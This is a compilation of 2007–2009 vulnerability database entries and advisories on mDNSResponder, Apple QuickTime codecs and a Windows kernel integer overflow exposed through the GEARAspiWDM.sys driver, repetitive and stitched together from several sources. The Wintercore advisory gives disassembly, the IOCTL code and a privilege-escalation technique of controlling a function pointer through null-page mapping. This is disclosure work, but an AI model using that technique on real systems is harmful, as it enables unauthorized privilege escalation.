Bonjour, an initiative for zero-configuration networking. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/mDNSResponder < 212.1 >= 212.1 Description =========== Multiple vulnerabilities have been discovered in mDNSResponder. Please review the CVE identifiers referenced below for details. Impact ====== A local or remote attacker may be able to execute arbitrary code with root privileges or cause a Denial of Service. Workaround ========== There is no known workaround at this time. Resolution ========== All mDNSResponder users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/mDNSResponder-212.1" NOTE: This is a legacy GLSA. Updates for all affected architectures are available since November 21, 2009. It is likely that your system is already no longer affected by this issue. References ========== [ 1 ] CVE-2007-2386 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2386 [ 2 ] CVE-2007-3744 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3744 [ 3 ] CVE-2007-3828 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3828 [ 4 ] CVE-2008-0989 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0989 [ 5 ] CVE-2008-2326 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2326 [ 6 ] CVE-2008-3630 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3630 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201201-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . 1) A NULL pointer dereference error in the Bonjour Namespace Provider component when resolving ".local" domain names can be exploited to cause a crash the application via a specially crafted ".local" domain name containing an overly long DNS label. SOLUTION: Update to version 1.0.5. http://www.apple.com/support/downloads/bonjourforwindows105.html PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Mario Ballano, 48bits.com. 2) Reported by the vendor. ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT2990 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
VAR-200809-0208 CVE-2008-3636 Gear Software CD DVD Filter driver privilege escalation vulnerability CVSS V2: 7.2
CVSS V3: -
Severity: HIGH
Integer overflow in the IopfCompleteRequest API in the kernel in Microsoft Windows 2000, XP, Server 2003, and Vista allows context-dependent attackers to gain privileges. NOTE: this issue was originally reported for GEARAspiWDM.sys 2.0.7.5 in Gear Software CD DVD Filter driver before 4.001.7, as used in other products including Apple iTunes and multiple Symantec and Norton products, which allows local users to gain privileges via repeated IoAttachDevice IOCTL calls to \\.\GEARAspiWDMDevice in this GEARAspiWDM.sys. However, the root cause is the integer overflow in the API call itself. Windows upper Apple iTunes Contains an integer overflow vulnerability in the included third-party driver.Privilege may be elevated to a malicious local user. Local attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will cause a denial-of-service condition. Windows is a very popular operating system of Microsoft Corporation. [ HTML FORMATED Advisory ] http://www.wintercore.com/advisories/advisory_W021008.html [TEXT VERSION] GearSoftware Powered Products Local Privilege Escalation + GEARASpiWDM.sys Insecure Method + Microsoft Windows Kernel IopfCompleteRequest Integer Overflow :: Summary 1. Background 2. Non-technical description 3. Technical Description 4. Exploiting it 5. References 6. Affected Products 7. Credits 8. Disclosure Timeline 9. Contact 1. GEAR develops solutions for professional premastering, DVD editing and authoring, and is also a leading provider of development tools that enable software companies to integrate optical recording technology into their own products. GEAR technology is integrated into solutions from some of the world's most prominent technology organizations, including Apple, Symantec, Siemens, Kodak, Philips and Bosch, among many others" www.gearsoftware.com 2. However, the attack vector needed for taking advantage of this weakness has not been identified on a out-of-box Windows installation. Therefore, a third-party application is, so far, the unique possible attack vector to exploit this issue. This advisory covers the attack vector found in a widely extended licensed application, GearSoftware Recording SDK, which was exposing the kernel flaw to user-mode attackers through one of its filter drivers: GEARAspiWDM.sys Since this driver is a licensed solution, it is bundled with several well-known products. To clarify as much as possible this vulnerability, we should distinguish three different elements which make up the problem. 1. 2. The Attack Vector: GearAspiWDM.sys Insecure Method. 3. Vulnerable Products: Every GearSoftware powered product that is bundled with GEARAspiWDM.sys. (e.g Norton 360, Apple iTunes...) Whilst the underlying vulnerability is, under our point of view, a real vulnerability, the Attack Vector may or may not be considered a vulnerability by itself. Note that if we supress the underlying vulnerability from the equation, then the attack vector turns out to be practically useless, however by patching only the attack vector we will always be facing the risk that another one comes to light.On the other hand, this fact is not impossible but seems very unlikely. Microsoft, as the vendor affected by the underlying vulnerability, Apple and Symantec as Vulnerable Products were directly contacted . After verifying the details provided Microsoft did not consider this flaw elegible for a patch. Therefore,with the help of the US-CERT, Symantec, Apple, GearSoftware and Wintercore were coordinated during the process of resolving this issue by patching GEARAspiWDM.sys driver. The final outcome is that the Attack Vector has been patched although the underlying vulnerability still remains unpatched. 3. Technical Description. The problem lies in how the stack locations are traversed while trying to complete an IRP. Let's see lkd> dt nt!_IRP [...] +0x022 StackCount : Char *signed* +0x023 CurrentLocation : Char *signed* [...] Module: ntoskrnl.exe Version: XP SP2 .text:0040CC01 .text:0040CC01 ; __fastcall IopfCompleteRequest(x, x) .text:0040CC01 @IopfCompleteRequest@8 proc near ; CODE XREF: IoPerfCompleteRequest(x,x)+88p .text:0040CC01 ; IoPerfCompleteRequest(x,x)+B8p ... .text:0040CC01 .text:0040CC01 var_C = dword ptr -0Ch .text:0040CC01 var_8 = dword ptr -8 .text:0040CC01 var_1 = byte ptr -1 .text:0040CC01 .text:0040CC01 .text:0040CC01 mov edi, edi .text:0040CC03 push ebp .text:0040CC04 mov ebp, esp .text:0040CC06 sub esp, 10h .text:0040CC09 push ebx .text:0040CC0A push esi .text:0040CC0B mov esi, ecx .text:0040CC0D mov cl, [esi+23h] ; Irp->CurrentLocation .text:0040CC10 mov [ebp+var_8], edx .text:0040CC13 mov dl, [esi+22h] ; Irp->StackCount .text:0040CC16 xor ebx, ebx .text:0040CC18 inc dl ; Irp->StackCount+1 .text:0040CC1A cmp cl, dl .text:0040CC1C push edi .text:0040CC1D mov [ebp+var_C], ebx .text:0040CC20 jg sub_444F81 .text:0040CC26 cmp word ptr [esi], 6 ; Irp->Type == IO_TYPE_IRP .text:0040CC2A jnz sub_444F81 .text:0040CC30 mov edi, [esi+60h] ; Irp->CurrentStackLocation .text:0040CC33 inc cl .text:0040CC35 cmp cl, dl .text:0040CC37 lea eax, [edi+24h] .text:0040CC3A mov [esi+23h], cl ; Irp->CurrentLocation++ .text:0040CC3D mov [esi+60h], eax ;Irp->Tail->Overlay.CurrentStackLocation++ .text:0040CC40 jg short loc_40CCA6 .text:0040CC42 add edi, 3 {...} .text:0040CC8D .text:0040CC8D loc_40CC8D: ; CODE XREF: IopfCompleteRequest(x,x)+13Cj .text:0040CC8D add dword ptr [esi+60h], 24h ; StackLocation++ .text:0040CC91 mov eax, [esi+60h] .text:0040CC94 add edi, 24h ;Irp->Tail.Overlay.CurrentStackLocation++ .text:0040CC97 inc byte ptr [esi+23h] ; Irp->CurrentLocation++ .text:0040CC9A mov dl, [esi+22h] ; Irp->StackCount .text:0040CC9D mov cl, [esi+23h] ; Irp->CurrentLocation .text:0040CCA0 inc dl .text:0040CCA2 cmp cl, dl ; if CurrentLocation <= StackCount+1 .text:0040CCA4 jle short loc_40CC45 ; Signed comparison - FLAW - pStack = IoGetCurrentIrpStackLocation( Irp ) for( pStack, Irp->Tail.Overlay.CurrentStackLocation++ Irp->CurrentLocation++; Irp->CurrentLocation <= (CHAR) (Irp->StackCount + 1); pStack++, Irp->Tail.Overlay.CurrentStackLocation++ Irp->CurrentLocation++ ) { ... } Well, let's imagine an IRP where the StackCount and CurrentLocation = = 0x7e (pretty unusual but possible indeed) After the first iterate within the for(){...} , CurrentLocation will be 0x80 which is a negative value so Irp->CurrentLocation <= (CHAR) (Irp->StackCount+1) becomes TRUE.Hence, remaining iterations will be running out of allocated memory, traversing arbitrary and invalid stack locations. 4. Exploiting it. Digging into the for{} loop we found out the following: Module: ntoskrnl.exe XP SP2 (32-bit) .text:0040CD30 loc_40CD30: ; CODE XREF: IopfCompleteRequest(x,x)+4B47j .text:0040CD30 push dword ptr [edi+1Dh] .text:0040CD33 push esi .text:0040CD34 push eax .text:0040CD35 call dword ptr [edi+19h] .text:0040CD38 cmp eax, 0C0000016h .text:0040CD3D jnz loc_40CC8D ; StackLocation++ pStack->CompletionRoutine(...) We must note that once the flaw has been triggered the for{} is traversing invalid stack locations where *(edi+19h) points to undetermined memory. We also have to take into account the internals of the IO Manager where the memory allocated for the IRPs is zeroed. Therefore, it has been proven that by allocating user-mode memory at 0x0 we can control the function pointer dereferenced. However, that's not always true since we may be traversing uninitialized memory that holds random values. For that cases, it is also possible to seed the memory by issuing FSCTL/IOCTL requests before triggering the flaw,thus we can assure a high reliability exploiting this flaw. Anyway, the hardest task is to discover a suitable attack vector since you need to force a huge driver stack. The patched driver was found implementing an insecure method by which, an unlimited number of calls to IoAttachDevice (TargetDevice is also user-controlled) were available from user-land, simply by issuing an IOCTL request.Since GearspiWDM.sys is signed in Vista 64-bit, it is possible to bypass certain kernel restrictions by exploiting this issue sucessfully. The driver's insecure method is exposed via the following "free-for-all" device: + "\\.\GEARAspiWDMDevice" The flaw lies within the handler for the IOCTL = = 0x222020 Module: GEARspiWDM.sys (32-bit) .text:000114B2 loc_114B2: ; CODE XREF: sub_1137E+7Bj .text:000114B2 cmp [ebp+var_1], 0 .text:000114B6 jz short loc_114CC .text:000114B8 cmp [edi+54h], ecx .text:000114BB jz short loc_114CC .text:000114BD push ebx .text:000114BE mov ecx, edi .text:000114C0 call sub_11CA2 ; IRP_MJ_DEVICE_CONTROL Dispatch Routine {...} .text:00011CA2 mov eax, [esp+arg_0] .text:00011CA6 mov edx, [eax+60h] .text:00011CA9 mov edx, [edx+0Ch] .text:00011CAC push esi .text:00011CAD mov esi, 222010h .text:00011CB2 cmp edx, esi .text:00011CB4 ja short loc_11CF7 .text:00011CB6 jz short loc_11CEF .text:00011CB8 sub edx, 222000h .text:00011CBE jz short loc_11CE7 {...} .text:00011D10 loc_11D10: ; CODE XREF: sub_11CA2+65j .text:00011D10 push eax ; DeviceObject .text:00011D11 call sub_11B90 || \/ Module: GEARspiWDM.sys (32-bit) .text:00011B90 ; int __stdcall sub_11B90(PDEVICE_OBJECT DeviceObject) .text:00011B90 sub_11B90 proc near ; CODE XREF: sub_11CA2+6Fp .text:00011B90 .text:00011B90 TargetDevice = UNICODE_STRING ptr -10h .text:00011B90 var_8 = dword ptr -8 .text:00011B90 var_4 = dword ptr -4 .text:00011B90 DeviceObject = dword ptr 8 .text:00011B90 .text:00011B90 push ebp .text:00011B91 mov ebp, esp .text:00011B93 sub esp, 10h .text:00011B96 mov eax, [ebp+DeviceObject] .text:00011B99 mov eax, [eax+3Ch] .text:00011B9C push ebx .text:00011B9D xor ebx, ebx .text:00011B9F cmp eax, ebx .text:00011BA1 push edi .text:00011BA2 mov edi, ecx .text:00011BA4 mov [ebp+var_8], eax .text:00011BA7 mov [ebp+DeviceObject], ebx .text:00011BAA jnz short loc_11BB6 .text:00011BAC mov eax, 0C000000Dh .text:00011BB1 jmp loc_11C9C .text:00011BB6 ; --------------------------------------------------------------------------- .text:00011BB6 .text:00011BB6 loc_11BB6: ; CODE XREF: sub_11B90+1Aj .text:00011BB6 push eax ; SourceString .text:00011BB7 lea eax, [ebp+TargetDevice] .text:00011BBA push eax ; DestinationString .text:00011BBB call ds:RtlInitUnicodeString {...} .text:00011C3E lea edi, [esi+10h] .text:00011C41 push edi ; AttachedDevice .text:00011C42 lea eax, [ebp+TargetDevice] .text:00011C45 push eax ; TargetDevice ; user-controlled .text:00011C46 push [ebp+DeviceObject] ; SourceDevice .text:00011C49 call ds:IoAttachDevice 5. References GearSoftware Updated Drivers: http://www.gearsoftware.com/support/drivers.cfm KB-CERT: http://www.kb.cert.org/vuls/id/146896 Symantec: http://www.symantec.com/avcenter/security/Content/2008.10.07a.html Apple: http://support.apple.com/kb/HT3025 6. Affected Products Product/File Vulnerable Version GearAspiWDM.sys < 2.011.2 (32-bit) < 2.008.2.1 (64-bit) Microsoft Windows Kernel All versions 32/64-bit + 2000 + 2003 + XP + Vista Apple iTunes 7.x Symantec Norton 360 2.0 and earlier Symantec Norton Ghost 14.0 and earlier Symantec Norton Save and Restore 2.0 and earlier Symantec Backup Exec System Recovery 6.x, 7.x and 8.x 7. Credits Vulnerability discovered and researched by Ruben Santamarta, Wintercore. 8. Disclosure Timeline 11/14/2007 - Microsoft Contacted 12/26/2007 - Symantec Contacted 12/26/2007 - Apple Contacted 10/07/2008 - Coordinated Disclosure 9. Contact Wintercore Agustin de Betancourt, 21. 8th Floor. 28003 Madrid. Spain. Phone: +(34) 91 395 63 40 contact (at) wintercore (dot) com [email concealed] www.wintercore.com -- Wintercore Agustin de Betancourt, 21. 8th Floor. 28003 Madrid. Spain. Phone: +(34) 91 395 63 40 www.wintercore.com
VAR-200809-0202 CVE-2008-3629 Apple QuickTime PICT Denial of Service Vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Apple QuickTime before 7.5.5 allows remote attackers to cause a denial of service (application crash) via a crafted PICT image that triggers an out-of-bounds read. Apple QuickTime is prone to a denial-of-service vulnerability. This issue arises when the application handles specially crafted PICT image files. Successful exploits may allow attackers to crash the affected application, denying service to legitimate users. NOTE: This issue was previously described in BID 31086 (Apple QuickTime Movie/PICT/QTVR Multiple Remote Vulnerabilities) but has been given its own record to better document the vulnerability. The following are vulnerable: QuickTime 7.5 and earlier Apple TV 2.1 and earlier. 1) An error in the third-party Indeo5 codec for QuickTime can be exploited to access uninitialised memory via a specially crafted movie file. 2) A boundary error in QuickTimeInternetExtras.qtx when parsing files via the third-party Indeo3.2 codec for QuickTime can be exploited to cause a stack-based buffer overflow via a specially crafted movie file. 3) A boundary error in the parsing of panorama atoms in QTVR (QuickTime Virtual Reality) movie files can be exploited to cause a heap-based buffer overflow via a specially crafted QTVR file. 4) A boundary error in the parsing of panorama PDAT atoms in QTVR (QuickTime Virtual Reality) movie files can be exploited to cause a stack-based buffer overflow via a QTVR file containing specially crafted "maxTilt", "minFieldOfView", and "maxFieldOfView" elements. 6) An error in the CallComponentFunctionWithStorage() function when parsing STSZ atoms in movie files can be exploited to corrupt memory via a movie file containing a overly large entry in sample_size_table. 7) Multiple errors when parsing H.264 encoded movie files (e.g. an integer overflow when parsing AVC1 atoms and two errors when parsing MDAT atoms) can be exploited to corrupt memory via a specially crafted file. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. SOLUTION: Update to version 7.5.5. QuickTime 7.5.5 for Windows: http://www.apple.com/support/downloads/quicktime755forwindows.html QuickTime 7.5.5 for Leopard: http://www.apple.com/support/downloads/quicktime755forleopard.html QuickTime 7.5.5 for Tiger: http://www.apple.com/support/downloads/quicktime755fortiger.html PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Paul Byrne, NGSSoftware. 2) Reported by an anonymous person via ZDI. 3) The vendor credits Roee Hay, IBM Rational Application Security Research Group. 4) Reported by an anonymous person via ZDI. 5) Reported by an anonymous person via iDefense VCP. 6) Reported by an anonymous person via ZDI. 7) Reported by an anonymous person and Subreption via ZDI. 8) The vendor credits David Wharton. ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT3027 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-08-057/ http://www.zerodayinitiative.com/advisories/ZDI-08-058/ http://www.zerodayinitiative.com/advisories/ZDI-08-059/ http://www.zerodayinitiative.com/advisories/ZDI-08-060/ http://www.zerodayinitiative.com/advisories/ZDI-08-061/ http://www.zerodayinitiative.com/advisories/ZDI-08-062/ iDefense VCP: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=744 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
VAR-200809-0197 CVE-2008-3624 Apple QuickTime In QTVR Heap-based buffer overflow vulnerability in movie file handling CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Heap-based buffer overflow in Apple QuickTime before 7.5.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a QuickTime Virtual Reality (QTVR) movie file with crafted panorama atoms. These issues arise when the application handles specially crafted PICT image files, movies, and QTVR movies. Successful exploits may allow attackers to gain remote unauthorized access in the context of a vulnerable user and to trigger a denial-of-service condition. Versions prior to QuickTime 7.5.5 are affected. NOTE: Two issues that were previously covered in this BID were given their own records to better document the details: - CVE-2008-3626 was moved to BID 31546 ('Apple QuickTime 'STSZ' Atoms Memory Corruption Vulnerability') - CVE-2008-3629 was moved to BID 31548 ('Apple QuickTime PICT Denial of Service Vulnerability'). Apple QuickTime is a very popular multimedia player. ---------------------------------------------------------------------- We have updated our website, enjoy! http://secunia.com/ ---------------------------------------------------------------------- TITLE: Apple QuickTime Multiple Vulnerabilities SECUNIA ADVISORY ID: SA31821 VERIFY ADVISORY: http://secunia.com/advisories/31821/ CRITICAL: Highly critical IMPACT: System access WHERE: >From remote SOFTWARE: Apple QuickTime 7.x http://secunia.com/advisories/product/5090/ DESCRIPTION: Multiple vulnerabilities have been reported in QuickTime, which can be exploited by malicious people to compromise a user's system. 1) An error in the third-party Indeo5 codec for QuickTime can be exploited to access uninitialised memory via a specially crafted movie file. 6) An error in the CallComponentFunctionWithStorage() function when parsing STSZ atoms in movie files can be exploited to corrupt memory via a movie file containing a overly large entry in sample_size_table. 7) Multiple errors when parsing H.264 encoded movie files (e.g. an integer overflow when parsing AVC1 atoms and two errors when parsing MDAT atoms) can be exploited to corrupt memory via a specially crafted file. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. SOLUTION: Update to version 7.5.5. QuickTime 7.5.5 for Windows: http://www.apple.com/support/downloads/quicktime755forwindows.html QuickTime 7.5.5 for Leopard: http://www.apple.com/support/downloads/quicktime755forleopard.html QuickTime 7.5.5 for Tiger: http://www.apple.com/support/downloads/quicktime755fortiger.html PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Paul Byrne, NGSSoftware. 2) Reported by an anonymous person via ZDI. 3) The vendor credits Roee Hay, IBM Rational Application Security Research Group. 4) Reported by an anonymous person via ZDI. 5) Reported by an anonymous person via iDefense VCP. 6) Reported by an anonymous person via ZDI. 7) Reported by an anonymous person and Subreption via ZDI. 8) The vendor credits David Wharton. ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT3027 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-08-057/ http://www.zerodayinitiative.com/advisories/ZDI-08-058/ http://www.zerodayinitiative.com/advisories/ZDI-08-059/ http://www.zerodayinitiative.com/advisories/ZDI-08-060/ http://www.zerodayinitiative.com/advisories/ZDI-08-061/ http://www.zerodayinitiative.com/advisories/ZDI-08-062/ iDefense VCP: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=744 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
VAR-200809-0207 CVE-2008-3635 Windows upper Apple QuickTime Used in Indeo v3.2 Codec stack-based buffer overflow vulnerability CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Stack-based buffer overflow in QuickTimeInternetExtras.qtx in an unspecified third-party Indeo v3.2 (aka IV32) codec for QuickTime, when used with Apple QuickTime before 7.5.5 on Windows, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted movie file. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of QuickTime files that utilize the Indeo video codec. A lack of proper bounds checking within QuickTimeInternetExtras.qtx can result in a stack based buffer overflow leading to arbitrary code execution under the context of the currently logged in user. These issues arise when the application handles specially crafted PICT image files, movies, and QTVR movies. Successful exploits may allow attackers to gain remote unauthorized access in the context of a vulnerable user and to trigger a denial-of-service condition. Versions prior to QuickTime 7.5.5 are affected. NOTE: Two issues that were previously covered in this BID were given their own records to better document the details: - CVE-2008-3626 was moved to BID 31546 ('Apple QuickTime 'STSZ' Atoms Memory Corruption Vulnerability') - CVE-2008-3629 was moved to BID 31548 ('Apple QuickTime PICT Denial of Service Vulnerability'). Apple QuickTime is a very popular multimedia player. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT3027 -- Disclosure Timeline: 2008-08-19 - Vulnerability reported to vendor 2008-09-09 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster@3com.com. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . ---------------------------------------------------------------------- We have updated our website, enjoy! http://secunia.com/ ---------------------------------------------------------------------- TITLE: Apple QuickTime Multiple Vulnerabilities SECUNIA ADVISORY ID: SA31821 VERIFY ADVISORY: http://secunia.com/advisories/31821/ CRITICAL: Highly critical IMPACT: System access WHERE: >From remote SOFTWARE: Apple QuickTime 7.x http://secunia.com/advisories/product/5090/ DESCRIPTION: Multiple vulnerabilities have been reported in QuickTime, which can be exploited by malicious people to compromise a user's system. 1) An error in the third-party Indeo5 codec for QuickTime can be exploited to access uninitialised memory via a specially crafted movie file. 3) A boundary error in the parsing of panorama atoms in QTVR (QuickTime Virtual Reality) movie files can be exploited to cause a heap-based buffer overflow via a specially crafted QTVR file. 6) An error in the CallComponentFunctionWithStorage() function when parsing STSZ atoms in movie files can be exploited to corrupt memory via a movie file containing a overly large entry in sample_size_table. 7) Multiple errors when parsing H.264 encoded movie files (e.g. an integer overflow when parsing AVC1 atoms and two errors when parsing MDAT atoms) can be exploited to corrupt memory via a specially crafted file. SOLUTION: Update to version 7.5.5. QuickTime 7.5.5 for Windows: http://www.apple.com/support/downloads/quicktime755forwindows.html QuickTime 7.5.5 for Leopard: http://www.apple.com/support/downloads/quicktime755forleopard.html QuickTime 7.5.5 for Tiger: http://www.apple.com/support/downloads/quicktime755fortiger.html PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Paul Byrne, NGSSoftware. 2) Reported by an anonymous person via ZDI. 3) The vendor credits Roee Hay, IBM Rational Application Security Research Group. 4) Reported by an anonymous person via ZDI. 5) Reported by an anonymous person via iDefense VCP. 6) Reported by an anonymous person via ZDI. 7) Reported by an anonymous person and Subreption via ZDI. 8) The vendor credits David Wharton. ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT3027 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-08-057/ http://www.zerodayinitiative.com/advisories/ZDI-08-058/ http://www.zerodayinitiative.com/advisories/ZDI-08-059/ http://www.zerodayinitiative.com/advisories/ZDI-08-060/ http://www.zerodayinitiative.com/advisories/ZDI-08-061/ http://www.zerodayinitiative.com/advisories/ZDI-08-062/ iDefense VCP: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=744 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
VAR-200809-0189 CVE-2008-3615 Windows upper Apple QuickTime Used in Indeo v5 Codec memory corruption vulnerability CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
ir50_32.qtx in an unspecified third-party Indeo v5 codec for QuickTime, when used with Apple QuickTime before 7.5.5 on Windows, accesses uninitialized memory, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted movie file. These issues arise when the application handles specially crafted PICT image files, movies, and QTVR movies. Successful exploits may allow attackers to gain remote unauthorized access in the context of a vulnerable user and to trigger a denial-of-service condition. Versions prior to QuickTime 7.5.5 are affected. NOTE: Two issues that were previously covered in this BID were given their own records to better document the details: - CVE-2008-3626 was moved to BID 31546 ('Apple QuickTime 'STSZ' Atoms Memory Corruption Vulnerability') - CVE-2008-3629 was moved to BID 31548 ('Apple QuickTime PICT Denial of Service Vulnerability'). Apple QuickTime is a very popular multimedia player. ---------------------------------------------------------------------- We have updated our website, enjoy! http://secunia.com/ ---------------------------------------------------------------------- TITLE: Apple QuickTime Multiple Vulnerabilities SECUNIA ADVISORY ID: SA31821 VERIFY ADVISORY: http://secunia.com/advisories/31821/ CRITICAL: Highly critical IMPACT: System access WHERE: >From remote SOFTWARE: Apple QuickTime 7.x http://secunia.com/advisories/product/5090/ DESCRIPTION: Multiple vulnerabilities have been reported in QuickTime, which can be exploited by malicious people to compromise a user's system. 3) A boundary error in the parsing of panorama atoms in QTVR (QuickTime Virtual Reality) movie files can be exploited to cause a heap-based buffer overflow via a specially crafted QTVR file. 4) A boundary error in the parsing of panorama PDAT atoms in QTVR (QuickTime Virtual Reality) movie files can be exploited to cause a stack-based buffer overflow via a QTVR file containing specially crafted "maxTilt", "minFieldOfView", and "maxFieldOfView" elements. 6) An error in the CallComponentFunctionWithStorage() function when parsing STSZ atoms in movie files can be exploited to corrupt memory via a movie file containing a overly large entry in sample_size_table. 7) Multiple errors when parsing H.264 encoded movie files (e.g. an integer overflow when parsing AVC1 atoms and two errors when parsing MDAT atoms) can be exploited to corrupt memory via a specially crafted file. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. SOLUTION: Update to version 7.5.5. QuickTime 7.5.5 for Windows: http://www.apple.com/support/downloads/quicktime755forwindows.html QuickTime 7.5.5 for Leopard: http://www.apple.com/support/downloads/quicktime755forleopard.html QuickTime 7.5.5 for Tiger: http://www.apple.com/support/downloads/quicktime755fortiger.html PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Paul Byrne, NGSSoftware. 2) Reported by an anonymous person via ZDI. 3) The vendor credits Roee Hay, IBM Rational Application Security Research Group. 4) Reported by an anonymous person via ZDI. 5) Reported by an anonymous person via iDefense VCP. 6) Reported by an anonymous person via ZDI. 7) Reported by an anonymous person and Subreption via ZDI. 8) The vendor credits David Wharton. ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT3027 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-08-057/ http://www.zerodayinitiative.com/advisories/ZDI-08-058/ http://www.zerodayinitiative.com/advisories/ZDI-08-059/ http://www.zerodayinitiative.com/advisories/ZDI-08-060/ http://www.zerodayinitiative.com/advisories/ZDI-08-061/ http://www.zerodayinitiative.com/advisories/ZDI-08-062/ iDefense VCP: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=744 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all 